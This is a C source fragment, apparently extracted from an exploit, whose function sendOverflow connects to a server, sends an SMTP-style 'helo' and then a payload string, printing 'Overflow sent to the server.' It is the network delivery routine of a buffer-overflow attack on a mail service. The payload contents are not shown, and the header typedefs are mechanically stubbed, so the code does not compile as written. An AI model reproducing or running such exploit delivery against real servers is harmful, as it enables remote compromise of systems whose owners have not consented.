
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


struct TYPE_3__ {int s_addr; } ;
struct TYPE_4__ {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
typedef TYPE_2__ sockaddr_in ;
typedef int sockaddr ;
typedef int peer ;
typedef int WSADATA ;
typedef int SOCKET ;


 int AF_INET ;
 int IPPROTO_TCP ;
 int PF_INET ;
 int SOCKET_ERROR ;
 int SOCK_STREAM ;
 int Sleep (int) ;
 int WSACleanup () ;
 int WSAStartup (int,int *) ;
 int closesocket (int ) ;
 int connect (int ,int *,int) ;
 int htons (int ) ;
 int inet_addr (int ) ;
 int ipaddr ;
 int port ;
 int printf (char*) ;
 int recv (int ,char*,int,int) ;
 char* s ;
 int send (int ,char*,int ,int) ;
 int socket (int ,int ,int ) ;
 int strlen (char*) ;

void sendOverflow(void)
 {
         SOCKET socket1;
         WSADATA winSockData;
         sockaddr_in peer;
         int flags;
         int result;
         char buffer[1024];


         WSAStartup(0x0101, &winSockData);
         socket1 = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
         peer.sin_family = AF_INET;
         peer.sin_port = htons(port);
         peer.sin_addr.s_addr = inet_addr(ipaddr);
         result = connect(socket1, (sockaddr *) &peer, sizeof(peer));
         if (result != 0) {
                 printf("Couldn't connect to the server!\n");
                 closesocket(socket1);
                 WSACleanup();
         }
         else {



                 flags = 0;
                 result = recv(socket1, buffer, 1024, flags);

                 flags = 0;
                 result = send(socket1, "helo\r\n", strlen("helo\r\n"), flags);

                 flags = 0;
                 result = recv(socket1, buffer, 1024, flags);

                 flags = 0;
                 result = send(socket1, s, strlen(s), flags);
                 if (result != SOCKET_ERROR)
                         printf("Overflow sent to the server.\n");

                 Sleep(2000);

                 closesocket(socket1);
                 WSACleanup();
         }
 }
